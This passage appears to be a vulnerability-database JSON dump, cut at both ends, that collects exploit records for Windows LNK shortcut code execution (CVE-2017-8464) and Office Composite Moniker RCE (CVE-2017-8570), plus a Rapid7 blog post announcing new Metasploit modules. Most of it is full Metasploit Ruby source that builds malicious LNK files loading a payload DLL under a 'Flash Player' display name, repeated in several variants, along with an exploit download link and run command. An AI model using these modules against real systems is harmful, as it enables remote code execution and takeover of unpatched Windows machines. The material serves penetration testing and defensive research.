set to the Control Panel. This is enought to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n },\n 'Author' =>\n [\n 'Uncredited', # vulnerability discovery\n 'Yorick Koster' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2017-8464'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\n ['URL', 'http://paper.seebug.org/357/'], # writeup\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' =>\n {\n 'Space' => 2048,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'DefaultTarget' => 0, # Default target is 64-bit\n 'DisclosureDate' => 'Jun 13 2017'))\n\n register_advanced_options(\n [\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])\n ])\n end\n\n def exploit\n dll = generate_payload_dll\n dll_name = \"#{rand_text_alpha(16)}.dll\"\n dll_path = store_file(dll, dll_name)\n print_status(\"#{dll_path} created copy it to the root folder of the target USB drive\")\n\n # HACK the vulnerability doesn't appear to work with UNC paths\n # Create LNK files to different drives instead\n 'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i|\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\n lnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\")\n print_status(\"#{lnk_path} create, copy to the USB drive if drive letter is #{i}\")\n end\n end\n\n def generate_link(path)\n path << \"\\x00\"\n display_name = \"Flash Player\\x00\" # LNK Display Name\n comment = \"\\x00\"\n\n # Control Panel Applet ItemID with our DLL\n cpl_applet = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00\n ].pack('C*')\n cpl_applet << [path.length].pack('v')\n cpl_applet << [display_name.length].pack('v')\n cpl_applet << path.unpack('C*').pack('v*')\n cpl_applet << display_name.unpack('C*').pack('v*')\n cpl_applet << comment.unpack('C*').pack('v*')\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\n 0x00, 0x00, 0x00, 0x00, # FileSize\n 0x00, 0x00, 0x00, 0x00, # IconIndex\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\n 0x00, 0x00, # HotKey\n 0x00, 0x00, # Reserved1\n 0x00, 0x00, 0x00, 0x00, # Reserved2\n 0x00, 0x00, 0x00, 0x00 # Reserved3\n ].pack('C*')\n\n # IDList\n idlist_data = ''\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\n idlist_data << [\n # This PC\n 0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\n idlist_data << [\n # All Control Panel Items\n 0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [cpl_applet.length + 2].pack('v')\n idlist_data << cpl_applet\n idlist_data << [0x00].pack('v') # TerminalID\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData\n # SpecialFolderDataBlock\n ret << [\n 0x10, 0x00, 0x00, 0x00, # BlockSize\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\n 0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\n ].pack('C*')\n # TerminalBlock\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\n ret\n end\n\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\n def store_file(data, filename)\n ltype = \"exploit.fileformat.#{self.shortname}\"\n\n if ! ::File.directory?(Msf::Config.local_directory)\n FileUtils.mkdir_p(Msf::Config.local_directory)\n end\n\n if filename and not filename.empty?\n if filename =~ /(.*)\\.(.*)/\n ext = $2\n fname = $1\n else\n fname = filename\n end\n else\n fname = \"local_#{Time.now.utc.to_i}\"\n end\n\n fname = ::File.split(fname).last\n\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\n fname << \".#{ext}\"\n\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\n full_path = ::File.expand_path(path)\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\n\n full_path.dup\n end\nend", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Office - Composite Moniker Remote Code Execution", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-09T00:00:00", "type": "exploitpack", "title": "Microsoft Office - Composite Moniker Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199"], "modified": "2018-01-09T00:00:00", "id": "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "href": "", "sourceData": "## What?\n\nThis repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the \"Composite Moniker\" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44263.zip\n\n## Why?\n\nA few reasons.\n\n1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.\n2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the \"Script Moniker\" variant of CVE-2017-0199 and are not actually composite moniker exploits.\n3. Raise awareness of exploitation techniques used in the wild, and help defenders to detect exploitation attempts.\n\n## How to run\n\nSimply run the script, providing an Sct file to execute, and an output name for your RTF file:\n\n python packager_composite_moniker.py -s calc.sct -o example.rtf\n [+] RTF file written to: example.rtf\n\n\n## Detection\n\nI have included a Yara rule to detect attempts to exploit this vulnerability via RTF.\n\n## References\n\n- https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html\n- https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/\n- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-08-02T14:47:22", "description": "", "cvss3": {}, "published": "2017-08-01T00:00:00", "type": "packetstorm", "title": "Microsoft Windows LNK Shortcut File Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-08-01T00:00:00", "id": "PACKETSTORM:143623", "href": "https://packetstormsecurity.com/files/143623/Microsoft-Windows-LNK-Shortcut-File-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \n \nattr_accessor :exploit_dll_name \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'LNK Remote Code Execution Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) \nthat contain a dynamic icon, loaded from a malicious DLL. \n \nThis vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is \nsimilar except in an additional SpecialFolderDataBlock is included. The folder ID set \nin this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass \nthe CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary \nDLL file. \n}, \n'Author' => \n[ \n'Uncredited', # vulnerability discovery \n'Yorick Koster' # msf module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2017-8464'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], \n['URL', 'http://paper.seebug.org/357/'], # writeup \n['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ], \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ] \n], \n'DefaultTarget' => 0, # Default target is 64-bit \n'DisclosureDate' => 'Jun 13 2017')) \n \nregister_advanced_options( \n[ \nOptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]) \n]) \nend \n \ndef exploit \ndll = generate_payload_dll \ndll_name = \"#{rand_text_alpha(16)}.dll\" \ndll_path = store_file(dll, dll_name) \nprint_status(\"#{dll_path} created copy it to the root folder of the target USB drive\") \n \n# HACK the vulnerability doesn't appear to work with UNC paths \n# Create LNK files to different drives instead \n'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i| \nlnk = generate_link(\"#{i}:\\\\#{dll_name}\") \nlnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\") \nprint_status(\"#{lnk_path} create, copy to the USB drive if drive letter is #{i}\") \nend \nend \n \ndef generate_link(path) \npath << \"\\x00\" \ndisplay_name = \"Flash Player\\x00\" # LNK Display Name \ncomment = \"\\x00\" \n \n# Control Panel Applet ItemID with our DLL \ncpl_applet = [ \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00 \n].pack('C*') \ncpl_applet << [path.length].pack('v') \ncpl_applet << [display_name.length].pack('v') \ncpl_applet << path.unpack('C*').pack('v*') \ncpl_applet << display_name.unpack('C*').pack('v*') \ncpl_applet << comment.unpack('C*').pack('v*') \n \n# LinkHeader \nret = [ \n0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C \n0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 \n0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) \n0x00, 0x00, 0x00, 0x00, # FileAttributes \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime \n0x00, 0x00, 0x00, 0x00, # FileSize \n0x00, 0x00, 0x00, 0x00, # IconIndex \n0x00, 0x00, 0x00, 0x00, # ShowCommand \n0x00, 0x00, # HotKey \n0x00, 0x00, # Reserved1 \n0x00, 0x00, 0x00, 0x00, # Reserved2 \n0x00, 0x00, 0x00, 0x00 # Reserved3 \n].pack('C*') \n \n# IDList \nidlist_data = '' \nidlist_data << [0x12 + 2].pack('v') # ItemIDSize \nidlist_data << [ \n# This PC \n0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [0x12 + 2].pack('v') # ItemIDSize \nidlist_data << [ \n# All Control Panel Items \n0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [cpl_applet.length + 2].pack('v') \nidlist_data << cpl_applet \nidlist_data << [0x00].pack('v') # TerminalID \n \n# LinkTargetIDList \nret << [idlist_data.length].pack('v') # IDListSize \nret << idlist_data \n \n# ExtraData \n# SpecialFolderDataBlock \nret << [ \n0x10, 0x00, 0x00, 0x00, # BlockSize \n0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005 \n0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel) \n0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList \n].pack('C*') \n# TerminalBlock \nret << [0x00, 0x00, 0x00, 0x00].pack('V') \nret \nend \n \n# Store the file in the MSF local directory (eg, /root/.msf4/local/) \ndef store_file(data, filename) \nltype = \"exploit.fileformat.#{self.shortname}\" \n \nif ! ::File.directory?(Msf::Config.local_directory) \nFileUtils.mkdir_p(Msf::Config.local_directory) \nend \n \nif filename and not filename.empty? \nif filename =~ /(.*)\\.(.*)/ \next = $2 \nfname = $1 \nelse \nfname = filename \nend \nelse \nfname = \"local_#{Time.now.utc.to_i}\" \nend \n \nfname = ::File.split(fname).last \n \nfname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '') \nfname << \".#{ext}\" \n \npath = File.join(\"#{Msf::Config.local_directory}/\", fname) \nfull_path = ::File.expand_path(path) \nFile.open(full_path, \"wb\") { |fd| fd.write(data) } \n \nfull_path.dup \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143623/mswinlnk-exec.rb.txt"}, {"lastseen": "2017-11-09T22:09:36", "description": "", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "packetstorm", "title": "Microsoft Windows LNK File Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0095", "CVE-2015-0096"], "modified": "2017-11-08T00:00:00", "id": "PACKETSTORM:144927", "href": "https://packetstormsecurity.com/files/144927/Microsoft-Windows-LNK-File-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \n \nattr_accessor :exploit_dll_name \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'LNK Code Execution Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) \nthat contain a dynamic icon, loaded from a malicious DLL. \n \nThis vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is \nsimilar except an additional SpecialFolderDataBlock is included. The folder ID set \nin this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass \nthe CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary \nDLL file. \n \nThe PATH option must be an absolute path to a writeable directory which is indexed for \nsearching. If no PATH is specified, the module defaults to %USERPROFILE%. \n}, \n'Author' => \n[ \n'Uncredited', # vulnerability discovery \n'Yorick Koster', # msf module \n'Spencer McIntyre' # msf module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2017-8464'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], \n['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup \n['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format \n['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'], \n['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'FileDropperDelay' => 15, \n'WfsDelay' => 30 \n}, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => \n{ \n'Space' => 2048 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ], \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ] \n], \n'DefaultTarget' => 0, # Default target is Automatic \n'DisclosureDate' => 'Jun 13 2017' \n) \n) \n \nregister_options( \n[ \nOptString.new('FILENAME', [false, 'The LNK file']), \nOptString.new('DLLNAME', [false, 'The DLL file containing the payload']), \nOptString.new('PATH', [false, 'An explicit path to where the files should be written to']) \n] \n) \n \nregister_advanced_options( \n[ \nOptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), \nOptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) \n] \n) \nend \n \ndef check \nif session.sys.process['SearchIndexer.exe'] \nreturn Exploit::CheckCode::Detected \nend \n \nExploit::CheckCode::Safe \nend \n \ndef get_name(option, default_ext) \nname = datastore[option].to_s.strip \nname = \"#{rand_text_alpha(16)}.#{default_ext}\" if name.blank? \nname \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif session.platform != 'windows' \nfail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') \nend \n \nif check == Exploit::CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'Exploit not available on this system.') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') \narch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch'] \ndatastore['EXE::Path'] = path \ndatastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\") \n \npath = datastore['PATH'] || session.fs.file.expand_path(\"%USERPROFILE%\") \npath.chomp!(\"\\\\\") \n \ndll_path = \"#{path}\\\\#{get_name('DLLNAME', 'dll')}\" \nwrite_file(dll_path, generate_payload_dll) \n \nlnk_path = \"#{path}\\\\#{get_name('FILENAME', 'lnk')}\" \nwrite_file(lnk_path, generate_link(dll_path)) \nregister_files_for_cleanup(dll_path, lnk_path) \nend \n \ndef file_rm(file) \nif file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true) \n@dropped_files.delete(file) \nend \nend \n \ndef generate_link(path) \nvprint_status(\"Generating LNK file to load: #{path}\") \npath += \"\\x00\" # Do not use << here \ndisplay_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name \ncomment = datastore['LnkComment'].dup << \"\\x00\" \n \n# Control Panel Applet ItemID with our DLL \ncpl_applet = [ \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00 \n].pack('C*') \ncpl_applet << [path.length].pack('v') \ncpl_applet << [display_name.length].pack('v') \ncpl_applet << path.unpack('C*').pack('v*') \ncpl_applet << display_name.unpack('C*').pack('v*') \ncpl_applet << comment.unpack('C*').pack('v*') \n \n# LinkHeader \nret = [ \n0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C \n0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 \n0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) \n0x00, 0x00, 0x00, 0x00, # FileAttributes \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime \n0x00, 0x00, 0x00, 0x00, # FileSize \n0x00, 0x00, 0x00, 0x00, # IconIndex \n0x00, 0x00, 0x00, 0x00, # ShowCommand \n0x00, 0x00, # HotKey \n0x00, 0x00, # Reserved1 \n0x00, 0x00, 0x00, 0x00, # Reserved2 \n0x00, 0x00, 0x00, 0x00 # Reserved3 \n].pack('C*') \n \n# IDList \nidlist_data = '' \n# ItemID = ItemIDSize (2 bytes) + Data (variable) \nidlist_data << [0x12 + 2].pack('v') \nidlist_data << [ \n# All Control Panel Items \n0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \n# ItemID = ItemIDSize (2 bytes) + Data (variable) \nidlist_data << [cpl_applet.length + 2].pack('v') \nidlist_data << cpl_applet \nidlist_data << [0x00].pack('v') # TerminalID \n \n# LinkTargetIDList \nret << [idlist_data.length].pack('v') # IDListSize \nret << idlist_data \n \n# ExtraData \n# SpecialFolderDataBlock \nret << [ \n0x10, 0x00, 0x00, 0x00, # BlockSize \n0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005 \n0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel) \n0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList \n].pack('C*') \n# TerminalBlock \nret << [0x00, 0x00, 0x00, 0x00].pack('V') \nret \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144927/cve_2017_8464_lnk_lpe.rb.txt"}], "rapid7community": [{"lastseen": "2017-08-21T18:09:25", "description": "<!-- [DocumentBodyStart:3836c61a-5d77-47a8-9728-65d7e934a989] --><div class=\"jive-rendered-content\"><h2>Slowloris: SMB edition</h2><p>Taking a page from the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fweb.archive.org%2Fweb%2F20090822001255%2Fhttp%3A%2F%2Fha.ckers.org%2Fslowloris%2F\" rel=\"nofollow\" target=\"_blank\">Slowloris HTTP DoS attack</a>, the aptly named <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7946\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/08/03/smbloris-what-you-need-to-know\">SMBLoris DoS attack</a> exploits a vuln contained in <em>many</em> Windows releases (back to Windows 2000) and also affects Samba (a popular open source SMB implementation). Through creation of many connections to a target's SMB port, an attacker can exhaust all available memory on the target by sending a specific NBSS length header value over those connections, rendering the system unusable or crashed (if desired). And systems with SMB disabled are vulnerable to this attack too. Word is that Microsoft currently has no plans to issue a fix. Following the SMBLoris reveal at DEF CON (hat tip to the researchers at RiskSense!), Metasploit Framework now contains an <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8796\" rel=\"nofollow\" target=\"_blank\">exploit module</a> for fulfilling your SMBLoris needs.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>The Adventure of LNK</h2><p>Think Windows shortcut files are a convenient way to reference a file from multiple places? How about as an attack vector to get remote code execution on a target? Affecting a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2017-8464\" rel=\"nofollow\" target=\"_blank\">wide range of Windows releases</a>, a recently-landed <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8767\" rel=\"nofollow\" target=\"_blank\">exploit module</a> might be just what you're looking for to give this vector a go. Microsoft did release a patch this past June, but we're gonna guess a lot of systems still haven't picked that up yet.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Would you like RCE with your PDF (reader)?</h2><p>If so, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.gonitro.com%2Fpdf-reader\" rel=\"nofollow\" target=\"_blank\">Nitro's PDF reader</a> might be your hookup. Many versions of both Pro and regular flavors of the reader are vulnerable, providing JavaScript APIs which allow writing a payload to disk and then executing it. Check out the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Ffileformat%2Fnitro_reader_jsapi\" target=\"_blank\">new exploit module</a> and enjoy some of that tasty RCE.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Jenkins, tell me your secrets...</h2><p>If you periodically happen upon a target running Jenkins, we've got a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8627\" rel=\"nofollow\" target=\"_blank\">new post module</a> you might find useful. jenkins_gather will locate where Jenkins is installed on a system and then proceed to look for creds, tokens, SSH keys, etc., decrypting what it finds and conveniently adding it to your loot. It's been tested on a number of <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Fthesubtlety%2Fmetasploit-framework%2Fblob%2F7d033688ce2ca9221dcbed5b992798163cc12b56%2Fdocumentation%2Fmodules%2Fpost%2Fmulti%2Fgather%2Fjenkins_gather.md\" rel=\"nofollow\" target=\"_blank\">versions and platforms</a> and is ready for you to give it a try.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>And more!</h2><p>We've also:</p><ul><li>enabled ed25519 support with net-ssh</li><li>added better error handing for the Eternal Blue exploit module when it encounters a system that has SMB1 disabled (thx, <span class=\"citation\">@multiplex3r</span>!)</li></ul><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>New Modules</h2><p><em>Exploit modules</em> <em>(2 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Ffileformat%2Fcve_2017_8464_lnk_rce\" target=\"_blank\">LNK Code Execution Vulnerability</a> by Uncredited and Yorick Koster exploits CVE-2017-8464</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Ffileformat%2Fnitro_reader_jsapi\" target=\"_blank\">Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution</a> by sinn3r, Brendan Coles, and mr_me exploits CVE-2017-7442</li></ul><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><em>Auxiliary and post modules</em> <em>(2 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fdos%2Fsmb%2Fsmb_loris\" target=\"_blank\">SMBLoris NBSS Denial of Service</a> by thelightcosine</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Fmulti%2Fgather%2Fjenkins_gather\" target=\"_blank\">Jenkins Credential Collector</a> by thesubtlety</li></ul><p 